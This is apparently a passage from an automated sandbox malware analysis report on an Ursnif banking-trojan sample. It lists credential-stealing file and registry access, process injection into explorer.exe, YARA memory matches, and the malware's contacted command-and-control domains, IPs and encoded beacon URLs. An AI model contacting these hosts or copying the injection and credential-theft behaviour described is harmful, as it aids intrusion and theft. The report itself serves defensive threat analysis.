Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 350433 Sample: yytr.dll Startdate: 09/02/2021 Architecture: WINDOWS Score: 100 62 8.8.8.8.in-addr.arpa 2->62 64 1.0.0.127.in-addr.arpa 2->64 66 resolver1.opendns.com 2->66 80 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->80 82 Found malware configuration 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 9 other signatures 2->86 9 mshta.exe 2->9         started        12 loaddll32.exe 1 2->12         started        14 iexplore.exe 1 72 2->14         started        16 2 other processes 2->16 signatures3 process4 signatures5 112 Suspicious powershell command line found 9->112 18 powershell.exe 9->18         started        114 Writes to foreign memory regions 12->114 116 Allocates memory in foreign processes 12->116 118 Modifies the context of a thread in another process (thread injection) 12->118 120 4 other signatures 12->120 22 control.exe 12->22         started        24 rundll32.exe 12->24         started        26 iexplore.exe 41 14->26         started        29 iexplore.exe 30 16->29         started        31 iexplore.exe 16->31         started        33 iexplore.exe 16->33         started        process6 dnsIp7 54 C:\Users\user\AppData\...\qxfma03s.cmdline, UTF-8 18->54 dropped 56 C:\Users\user\AppData\Local\...\maejgtwh.0.cs, UTF-8 18->56 dropped 88 Injects code into the Windows Explorer (explorer.exe) 18->88 90 Writes to foreign memory regions 18->90 92 Modifies the context of a thread in another process (thread injection) 18->92 94 Compiles code for process injection (via .Net compiler) 18->94 35 explorer.exe 18->35 injected 39 csc.exe 18->39         started        42 csc.exe 18->42         started        44 conhost.exe 18->44         started        96 Changes memory attributes in foreign processes to executable or writable 22->96 98 Maps a DLL or memory area into another process 22->98 100 Creates a thread in another existing process (thread injection) 22->100 102 Contains functionality to detect sleep reduction / modifications 24->102 46 WerFault.exe 23 9 24->46         started        72 assets.onestore.ms 26->72 74 consentdeliveryfd.azurefd.net 26->74 76 ajax.aspnetcdn.com 26->76 78 pronpepsipirpyamvioerd.com 80.208.230.180, 49784, 49785, 49786 RACKRAYUABRakrejusLT Lithuania 29->78 file8 signatures9 process10 dnsIp11 68 eorctconthoelrrpentshfex.com 45.67.231.135, 443 SERVERIUS-ASNL Moldova Republic of 35->68 70 mozilla.cloudflare-dns.com 104.16.249.249, 443, 49794, 49795 CLOUDFLARENETUS United States 35->70 104 Tries to steal Mail credentials (via file access) 35->104 106 Changes memory attributes in foreign processes to executable or writable 35->106 108 Tries to harvest and steal browser information (history, passwords, etc) 35->108 110 6 other signatures 35->110 48 RuntimeBroker.exe 35->48 injected 58 C:\Users\user\AppData\Local\...\qxfma03s.dll, PE32 39->58 dropped 50 cvtres.exe 39->50         started        60 C:\Users\user\AppData\Local\...\maejgtwh.dll, PE32 42->60 dropped 52 cvtres.exe 42->52         started        file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.16.249.249
 unknown United States
13335 CLOUDFLARENETUS false
80.208.230.180
 unknown Lithuania
62282 RACKRAYUABRakrejusLT false
45.67.231.135
 unknown Moldova Republic of
50673 SERVERIUS-ASNL true

Contacted Domains

Name IP Active
pronpepsipirpyamvioerd.com 80.208.230.180 true
mozilla.cloudflare-dns.com 104.16.249.249 true
eorctconthoelrrpentshfex.com 45.67.231.135 true
resolver1.opendns.com 208.67.222.222 true
1.0.0.127.in-addr.arpa unknown unknown
assets.onestore.ms unknown unknown
8.8.8.8.in-addr.arpa unknown unknown
ajax.aspnetcdn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://pronpepsipirpyamvioerd.com/manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx false
  • Avira URL Cloud: safe
 unknown
http://pronpepsipirpyamvioerd.com/manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx false
  • Avira URL Cloud: safe
 unknown
http://pronpepsipirpyamvioerd.com/manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx false
  • Avira URL Cloud: safe
 unknown
http://pronpepsipirpyamvioerd.com/favicon.ico false
  • Avira URL Cloud: safe
 unknown